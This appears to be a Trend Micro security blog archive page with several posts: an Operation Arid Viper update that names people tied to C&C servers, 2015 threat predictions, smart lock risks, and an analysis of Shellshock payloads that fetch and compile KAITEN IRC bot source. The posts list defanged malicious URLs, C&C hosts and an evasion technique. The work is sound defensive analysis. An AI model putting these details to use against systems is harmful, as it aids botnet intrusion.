Trend Micro Facebook TrendLabs Twitter Malware Blog RSS Feed You Tube - Trend Micro
Search our blog:

  • Recent Posts

  • Calendar

    April 2015
    S M T W T F S
    « Mar    
  • Email Subscription

  • About Us
    TrendLabs Security Intelligence Blog(breadcrumbs are unavailable)

    Author Archive - Trend Micro

    operation-arid-viper-advtravel_thumbLast week, we released a research paper titled “Operation Arid Viper: Bypassing the Iron Dome” where we detailed two related campaigns. To recall, here are our key findings related to the two campaigns:

    • Palestinian threat actors have staged a targeted attack, Operation Arid Viper, to exfiltrate data from high-profile targets in the Israeli government and have been doing so since mid-2013. The attacks are still on-going, coinciding with the political tension between Israel and Palestinians.
    • Investigation of the Germany-hosted server used in Arid Viper revealed a group of Egyptian hackers (Advtravel) that have less technical knowhow and are attacking other Egyptians in less purposeful attacks.
    • Both groups have strong Arab ties, and the same server and site registration details suggest the existence of a supra-organization, a forum or an influential sponsor could be providing various hacking groups with the means to pursue their ends.

    Since the report was released, we have continued our investigation and have a number of updates:

    • None of the C&C domains have moved to other hosting providers or had other major changes since the publishing of our report. Although we have not seen newly compiled samples being spread – we have seen 2 recent attempted infections with existing binaries from Arid Viper on the 15th and 19th of February against a target in Israel and Kuwait respectively. For reference, our paper went public on the 16th.
    • Interestingly, a number of the people linked to the C&C servers in the paper have made changes to their public profiles since the paper went live. To date none of these individuals have contacted us to dispute the details we outlined in the paper:
      • The Facebook account we mentioned in the paper for Fathy Mostafa is now no longer active.
      • Quite a number of the accounts we related to Ebrahim Said El-Sharawy (aka Dev_Hima) have been modified or removed.  Upon inspection today, his accounts on Blogspot, Facebook, Twitter, and are no longer active. His main webpage ( which had hosted two questionable tools we outlined in the report has been changed to remove all of that content and has been replaced with the words “Closed by DevHima”:

    Screen Shot 2015-02-24 at 21.18.17

    •  Some of his other accounts such as his LinkedIn, SoundHound, and YouTube (which is hard to remove without deleting your personal Gmail account) are still live at the time of writing.
    • After further investigation, we now believe that the email used to register the C&C pstcmedia[dot]com ,, actually belongs to the Web hosting provider that registered this domain on a client’s behalf – and is not an individual involved in the campaign itself. We have updated our paper to remove reference to Mr. Samraa with the exception that the email address was used to register this site.

    Trend Micro will continue to research more on these campaigns over the coming months and post updates as we find them.

    Posted in Targeted Attacks |

    For many organizations today, the question is no longer if they will fall victim to a targeted attack, but when. In such an event, how an organization responds will determine whether it becomes a serious event or if it stays a mere annoyance.

    This requires something of a change of mindset for information security professionals. Previous techniques and many best practices are under the premise that an attacker can be kept out.

    However, that’s no longer the case today. The malware used in targeted attacks is frequently not detected (because it’s been custom-made for specific organizations). A well-crafted social engineering attack can look like a normal business email or engaging click bait.

    In short, an attacker with sufficient resources will be able to find their way inside their target, regardless of what the defender does. The defender can raise the price of getting in, but not prevent it entirely.

    The SANS Institute provides some guidelines to organizations on how they should react to incidents. Broadly speaking, however, the response can be divided into four steps:

    Read the rest of this entry »

    Posted in Targeted Attacks | Comments Off

    2014 brought with it many significant additions to the technology landscape. These put new capabilities into the hands of users and companies that allowed them to do things that they would not have thought possible before. However, these same changes also aid threat actors: threats can now come from unexpected vectors, and augment the existing capabilities that attackers already possess.

    What are the key developments that will shape the threat landscape of tomorrow, and how do we foresee its evolution? These are the trends that we think will shape 2015:

    More cybercriminals will turn to darknets and exclusive-access forums to share and sell crimeware.

    We’ve seen cybercriminals leveraging Deep Web and other darknet services as well as untraceable peer-to-peer networks (e.g. Tor, I2P, Freenet) for selling and exchanging tools and services. Takedowns and collaborative efforts beween researchers and law enforcement agencies have disrupted cybercrime gangs, giving them more reasons to go further underground. Security firms together with law enforcement agencies need to extend their reach by providing threat intelligence and having one definition of cybercrime to help law enforcers regardless of jurisdictions, to catch cybercriminals and attackers.

    Increased cyber activity will translate to better, bigger, and more successful hacking tools and attempts.

    Cybercriminals will go after bigger targets rather than home users as this can generate more profits for them. We will see more data breach incidents with banks, financial institutions, and customer data holders remaining to be attractive targets. As such, organizations and individuals need to assume compromise; enterprises need to constantly monitor their network for any threats while individual users must always change their passwords to prevent data theft.

    Exploit kits will target Android, as mobile vulnerabilities play a bigger role in device infection.

    Aside from the growth of Android threats, we will see more vulnerabilities found in mobile devices, apps, and platforms in the coming year. Cybercriminals will target data stored in these mobile devices. In addition, attackers may employ tools similar to Blackhole Exploit Kit (BHEK), leveraging Android OS fragmentation. Traditional threats like ransomware will plague the mobile landscape as well.

    Targeted attacks will become as prevalent as cybercrime.

    The success of high-profile targeted attack campaigns has highlighted the fact that cyber attacks are useful means of gathering intelligence. With this, we will see targeted attacks from other countries, not just countries that are commonly said to be the source of these attacks. We will observe more diversity in terms of targets and attack origins as more threat actors with differing agendas are seen. Although the motivations of threat actors may vary, they will continue to steal information such as top-secret government, data, financial information, intellectual property, industry blueprints, among others. Social media will become a new entry point for targeted attacks.

    New mobile payment methods will introduce new threats.

    The introduction of Apple Pay with the iPhone 6 and 6 Plus may kickstart the adoption of mobile payment systems by many consumers. Apple Pay is not alone in the market – other payment systems have or will be introduced by other companies and trade associations. Not all of these payment systems have been thoroughly tested to withstand real-world threats, and we may see attacks targeting mobile commerce in 2015.

    We will see more attempts to exploit vulnerabilities in open source apps.

    In 2014, we saw several vulnerabilities in open-source projects such as Shellshock and Heartbleed. These vulnerabilities were undetected for years and were only brought into light recently. Due to the massive impact of these vulnerabilities, cybercriminals and attackers may decide to investigate the existing code and see if other dormant vulnerabilities are present.

    They will also set their eyes on other less-known platforms, protocols, and software. Furthermore, they will look for vulnerabilities found in open source platforms and apps (for example Open SSL v3) as well as OS kernels.

    Technological diversity will save IoE/IoT devices from mass attacks but the same won’t be true for the data they process.

    A wide variety of devices will make up the Internet of Things/Internet of Everything – from fitness devices to smart home appliances, the smartification of everything will continue apace. This variety will also provide this field some measure of safety – no single attack will cover all of these devices. However, the data gathered by these devices may well be at risk if companies providing various IoE services are breached.

    More severe online banking and other financially motivated threats will surface.

    Weak security practices like not using two-factor authentication and chip-and-pin technology continue to persist in the banking sector. These practices will cause financially motivated threats to grow in scale throughout the coming year.

    Apart from credentials, cybercriminals will steal user identities. Mobile device users will also be affected by these threats as cybercriminals will launch mobile phishing attacks, use of fake aps and domain name system (DNS) changers. We will see stealthier mobile threats that use packers similar to computer software.

    More details about these predictions can be found at Trend Micro Security Predictions for 2015 and Beyond.


    Security is one of the top concerns when consumers consider buying smart devices. With cybercrime making the headlines every day, one has to think: is this smart device vulnerable to cyber attacks? Are these technologies secure enough for us to rely on them in our everyday lives?

    A good example of a technology that we need to assess for its security and reliability is the smart lock. One of the key characteristics of smart locks is the use of digital door keys, which are used to open them. Digital door keys are typically stored in the vendors cloud servers, along with other properties of the lock. This gives the owner great convenience, since they can “send” the keys to other people remotely in order to allow them temporary access.  It also enables the user to do comprehensive monitoring/reporting, for example, to detect any forced entry, to report any breakage to the lock, to send alerts to the user, etc.

    Smart locks, however, raise certain security risks as well. For instance, attackers may choose to target the vendor’s cloud servers, which may exist anywhere in the world, to get access to key information. Or if the smart lock supports web access, the attacker may attack the portal through code injection, cross-site scripting, etc. They may also launch phishing attacks to be able to get the user’s credentials to the vendor’s web portal used to manage the lock.

    The attackers can also target the communication between the owner’s smart lock and mobile device. Bluetooth Low Energy (BLE) is a popular protocol used for communication between the smart door lock and mobile device or mobile key fob. During the communication process, the digital key is sent from mobile phone to door lock over the air via BLE. The said communication is encrypted, but certain implementations can be subject to man-in-the middle (MITM) attack, as discussed in security community. Since this type of attack requires capturing of packet exchange during device setup, the time window for attack is short which reduces the attack surface significantly. However, it’s up to the vendor to provide a strong BLE security implementation.

    Some brands of smart locks allow user to lock/unlock anywhere in the world.  You can use vendor mobile app, or vendor web portal to check the lock status and lock/unlock it with a click of a finger.  This can be a desired feature for many consumers because of the ease and convenience it offers. The feature, however, does increase the attack surface.  In this case, instead of using BLE, the commands to the smart lock are sent over the Internet to the home router, and then to the lock via home Wi-Fi network, the smart lock device is visible in the local area network. Traditional IP based attacks such as port scanning and remote attack via open ports/firmware vulnerabilities can be used to attack the device.

    The Internet of Everything revolutionizes traditional hardware functionalities. While it creates security challenges, it also provides great opportunities. In the smart lock case, one can implement comprehensive monitoring/reporting, for example, to detect any force entry, broke of lock, send alert to user along with broken lock picture, and attacker picture, etc.  For critical IoE devices (such as door lock in a home), comprehensive monitoring/reporting is important to ensure software and hardware integrity to detect any malicious software/hardware attacks.

    For more detailed discussion on consumer buyer’s guide for smart home devices, you can read our Security Considerations for Consumers Buying Smart Home Devices.

    Posted in Internet of Everything | Comments Off

    Since the discovery of Shellshock, Trend Micro has continuously monitored the threat landscape for any attacks that may leverage these vulnerabilities. So far, we have identified an active IRC bot, exploit attempts in Brazil and China, botnet attacks, and a wide variety of malware payloads such as ELF_BASHLITE.A, ELF_BASHLET.A, and PERL_SHELLBOT.WZ among others.  It is reported that other vulnerable protocols like HTTP, SMTP, SSH, and FTP are also affected by Shellshock.

    We found that one of the payloads of Bash vulnerabilities, which we detect as TROJ_BASHKAI.SM, downloaded the source code of KAITEN malware, which is used to carry out denial-of-service attacks. Based on our analysis, when TROJ_BASHKAI.SM is executed, it connects to the following malicious URLs:

    • http://www[dot]computer-services[dot]name/b[dot]c
    • http://stablehost[dot]us/bots/regular[dot]bot

    When it connects to http://www[dot]computer-services[dot]name/b[dot]c, it downloads the KAITEN source code, which is then compiled using the common gcc compiler. This means that once connected to the URL, it won’t immediately download an executable file. Instead, it builds and compiles the source code, resulting in an executable file detected as ELF_KAITEN.SM.

    The act of downloading and compiling on the infected system can be seen as a precautionary measure. Downloaded directly as an executable file, the ELF file may have compatibility issues with different Linux OS distributions. Compiling on the infected system ensures that the malware executes properly.

    This routine could also be viewed as an evasion technique as some network security systems filter out non-executable files from scanning, due to network performance concerns. Systems configured this way may skip the scanning of the source code because it’s basically a text file. In addition, the recompilation of the source code can also have an effect of having differing binary files (which will have different hashes) across different Unix platforms. This will make detecting compiled binaries more difficult.

    ELF_KAITEN.SM connects to an IRC server at x[dot]secureshellz[dot]net where it joins the IRC channel #pwn and waits for commands. Some of the commands the attackers issued are:

    • Perform UDP flood
    • Perform SYN flood
    • Download files
    • Send raw IRC command
    • Start remote shell
    • Perform PUCH-ACK flood
    • Disable, enable, terminate client

    On the other hand, when it connects to http://stablehost[dot]us/bots/regular[dot]bot, it downloads three separate files. One of these is KAITEN source code, which is similarly compiled into ELF_KAITEN.A. This behaves similarly to ELF_KAITEN.SM, except it connects to linksys[dot]secureshellz[dot]net[colon]25 and to the channel #shellshock.

    The second downloaded file is a Mac OS X malware detected OSX_KAITEN.A, which behaves similarly to ELF_KAITEN.A. The third file is a shellbot detected as PERL_SHELBOT.SMO. This is a powerful IRC-controlled shellbot that connects to the same server as the two previous files, but to a different channel (#scan). However, unlike KAITEN that doesn’t scan for vulnerable servers, PERL_SHELLBOT.SMO scans for vulnerable websites through various search engines.

    Aside from downloading KAITEN and Shellbot, (detected as TROJ_BASHKAI.SM) creates a file /tmp/c which is used to schedule the download a file from the second URL weekly. This ensures that the payload is up to date.


    Figure 1. Screenshot of BASHKAI source code


    KAITEN is old IRC-controlled DDoS malware and as such, there is a possibility that the attackers employed Shellshock to revive its old activities like DDoS attacks to target organizations. Another theory we have is that the attackers behind Shellshock would like to expand their infection chain to include DDoS activities via KAITEN malware.

    Typically, systems infected with Shellshock payloads become a part of their botnet, and therefore can be used to launch DDoS attacks. In addition,  the emergence of a downloaded file that targets Mac OS clearly show that attackers are broadening their target platform.

    It was earlier reported that the “vast majority” of Mac OS X users are “safe by default” from Shellshock. However, users who configured to enable the Advanced Unix Services are still affected by this vulnerability. The Advanced Unix services enables remote access via Secure Shell (SSH) which offers ease of access to system or network administrators in managing their servers. This service is most likely enabled for machines used as servers such as web servers, which are the common targets Shellshock attacks.

    Trend Micro is continuously monitoring the threat landscape for any developments regarding Shellshock. For more information about threats exploiting Shellshock, , you can refer to our summary post.

    With additional analysis from Rhena Inocencio, Lenart Bermejo, Anthony Melgarejo, and Dexter To

    Posted in Exploits, Mac, Malware, Vulnerabilities | Comments Off


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice